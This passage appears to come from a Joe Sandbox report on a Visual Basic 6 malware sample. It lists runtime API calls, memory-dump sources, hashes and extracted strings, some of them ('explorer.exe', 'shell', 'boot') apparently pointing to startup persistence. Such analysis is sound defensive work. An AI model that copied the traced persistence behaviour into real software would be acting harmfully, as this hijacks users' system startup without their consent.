                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D0FA
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D1CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                    • String ID:
                                                                                    • API String ID: 1728155253-0
                                                                                    • Opcode ID: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
                                                                                    • Instruction ID: 5eaa79c7dd67bbe53d223c6610bcbbbf959998076f90a4c84057eb8df8a5bbf3
                                                                                    • Opcode Fuzzy Hash: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
                                                                                    • Instruction Fuzzy Hash: 73F10374D00208EFDB14DFA4C988ADEBBB5FF48304F20816DE50AAB291D779A985CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00419C7E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00419CAE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00419CCB
                                                                                    • __vbaSetSystemError.MSVBVM60(00000002,00000000,?,?,?,00000000,Function_000032B6), ref: 00419CE7
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419D24
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419D3D
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419D56
                                                                                    • __vbaStrFixstr.MSVBVM60(00000104,?,00000001), ref: 00419DB5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419DC3
                                                                                    • __vbaInStr.MSVBVM60(00000000,004099EC,00000000), ref: 00419DD1
                                                                                    • __vbaStrFixstr.MSVBVM60(00000104,?,-00000001), ref: 00419DED
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419DFB
                                                                                    • #616.MSVBVM60(00000000), ref: 00419E02
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419E10
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 00419E29
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419E51
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00419E67
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00419E83
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419EA8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419EC1
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419EDA
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 00419F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$AnsiMove$Fixstr$#616ChkstkFreeListLset
                                                                                    • String ID:
                                                                                    • API String ID: 3958989997-0
                                                                                    • Opcode ID: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
                                                                                    • Instruction ID: f493f75851a7fc0dbfc09fa37243ff87ef1c3d0c798e8d4c224362c0094269ff
                                                                                    • Opcode Fuzzy Hash: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
                                                                                    • Instruction Fuzzy Hash: D5612D71901259EFDB10EFA0CE4CBEEB778EB48305F1081E9E10AB6190DB785A84CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0042271E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042274B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0042275A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00422779
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00422788
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 0042279C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 004227AA
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004227BA
                                                                                    • #570.MSVBVM60(00000000), ref: 004227C1
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004227CE
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 00422801
                                                                                    • #525.MSVBVM60(00000000), ref: 00422808
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422813
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422823
                                                                                    • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 0042282E
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042283E
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042284B
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422866
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422876
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 0042287D
                                                                                    • __vbaFreeStr.MSVBVM60(004228BA), ref: 004228AA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004228B3
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 004228D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                    • String ID:
                                                                                    • API String ID: 2204187013-0
                                                                                    • Opcode ID: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
                                                                                    • Instruction ID: 20b1ae5d524e12f90e8be89b45e8a07560083909273999c33b36cc12d9e9d757
                                                                                    • Opcode Fuzzy Hash: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
                                                                                    • Instruction Fuzzy Hash: 3441DC71D00248EFDB04EFA4DB4DBDEBBB4EB48705F108169E502B76A0DB785A44CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,0040A1B4,00000011,00000000,660CC33A,6600A3D7), ref: 00426547
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00426571
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00426582
                                                                                    • #537.MSVBVM60(00000000), ref: 00426592
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042659F
                                                                                    • #537.MSVBVM60(?,00000000), ref: 004265AB
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004265B2
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004265B5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004265C0
                                                                                    • __vbaStrCmp.MSVBVM60(0040A198,00000000), ref: 004265C8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004265E5
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00426619
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042662F
                                                                                    • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426640
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426647
                                                                                    • __vbaStrCmp.MSVBVM60(0040A1AC,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042664F
                                                                                    • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426666
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042666D
                                                                                    • __vbaStrCmp.MSVBVM60(0040A1A4,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426675
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 004266AD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00426706), ref: 004266FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                    • String ID:
                                                                                    • API String ID: 2170920009-0
                                                                                    • Opcode ID: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
                                                                                    • Instruction ID: fe4e2f04ec6deddc8f2c7747cb95564e443f1ff94db73ec5ebb53e34e52d70e0
                                                                                    • Opcode Fuzzy Hash: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
                                                                                    • Instruction Fuzzy Hash: 4E51A371E002299BDB24DBB4CD45FEEBBB9EF48700F20822AE545FB291DA745904CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00428E91
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428E9F
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428EAA
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428ED0
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00428EDD
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428EF0
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428EFB
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428F1B
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00428F20
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428F45
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A308,00000078), ref: 00428F65
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00428F6D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007B0), ref: 00428F94
                                                                                    • #519.MSVBVM60(?), ref: 00428F9A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00428FA5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00428FB9
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00428FC5
                                                                                    • __vbaLenBstr.MSVBVM60(?), ref: 00428FCF
                                                                                    • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00428FFC
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0042900E
                                                                                    • __vbaFreeStr.MSVBVM60(00429046), ref: 0042903F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                    • String ID:
                                                                                    • API String ID: 2502233557-0
                                                                                    • Opcode ID: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
                                                                                    • Instruction ID: 8420092584710669aa1959ba4e0b61b057cd928f4a57778ab52aa14ced9d5afd
                                                                                    • Opcode Fuzzy Hash: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
                                                                                    • Instruction Fuzzy Hash: DC513C71A01218ABDB00EFA5DE48EDEBBB8FF58704F10416AF505F62A0D7789905CF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041983E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041986E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00419889
                                                                                    • __vbaVarDup.MSVBVM60 ref: 004198A3
                                                                                    • #606.MSVBVM60(?,?), ref: 004198BA
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004198C5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004198CE
                                                                                    • __vbaStrI2.MSVBVM60(00000000,00000000), ref: 004198DF
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004198EA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004198F5
                                                                                    • __vbaLenBstr.MSVBVM60(?,00000000), ref: 00419900
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041990F
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,000000FF,00000000), ref: 00419927
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00419935
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419949
                                                                                    • #644.MSVBVM60(?), ref: 0041995D
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041996C
                                                                                    • #616.MSVBVM60(?,?), ref: 0041997A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419985
                                                                                    • __vbaFreeStr.MSVBVM60(004199D0), ref: 004199C9
                                                                                    • __vbaErrorOverflow.MSVBVM60(?), ref: 004199E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeMoveSystem$Ansi$#606#616#644BstrChkstkListOverflowUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3094200983-0
                                                                                    • Opcode ID: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
                                                                                    • Instruction ID: c4f5bd512d1b3bf9bc8ce298c4f3288c9308f79173eb6556b40925b4054b111f
                                                                                    • Opcode Fuzzy Hash: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
                                                                                    • Instruction Fuzzy Hash: 2B410FB5900249EFDB04DFE4DE49BDEBBB8EB48305F104669F601B72A0DB746A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                    • __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
                                                                                      • Part of subcall function 004295B0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
                                                                                      • Part of subcall function 004295B0: __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
                                                                                      • Part of subcall function 004295B0: __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675
                                                                                    • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$AnsiFreeUnicode$Copy$#516#631ErrorList$BstrChkstkSystem
                                                                                    • String ID: boot$explorer.exe, $shell$yLb+$8
                                                                                    • API String ID: 913952100-2157437457
                                                                                    • Opcode ID: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
                                                                                    • Instruction ID: 6554cbec377a6d1fb2d016b249b8349fe5e87df9b4ee87d3b31f4120235b6aae
                                                                                    • Opcode Fuzzy Hash: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
                                                                                    • Instruction Fuzzy Hash: 9E311072910208EBCB05EF94DE58EDE7BB8FB48300F10812AF502B75A0DB745A48CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • #712.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FCC
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FD9
                                                                                    • #712.MSVBVM60(?,\\?\,00408114,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 00419FEE
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FF5
                                                                                    • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A00C
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A013
                                                                                    • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A02B
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A032
                                                                                    • #712.MSVBVM60(?,00409A70,00406544,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A047
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A04E
                                                                                    • __vbaStrCopy.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A056
                                                                                    • __vbaFreeStr.MSVBVM60(0041A077,?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A070
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$#712Move$CopyFree
                                                                                    • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                    • API String ID: 2546659950-1311169778
                                                                                    • Opcode ID: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
                                                                                    • Instruction ID: d6e337f52aa0f406b5b9e7ae7ca613ada50fa9dc8b45b6b45c56035a55262318
                                                                                    • Opcode Fuzzy Hash: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
                                                                                    • Instruction Fuzzy Hash: 7F213771B502197BCB00DB54CD82FEFBBB9AB54714F20422AB211B72E4DAB45D458ED4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
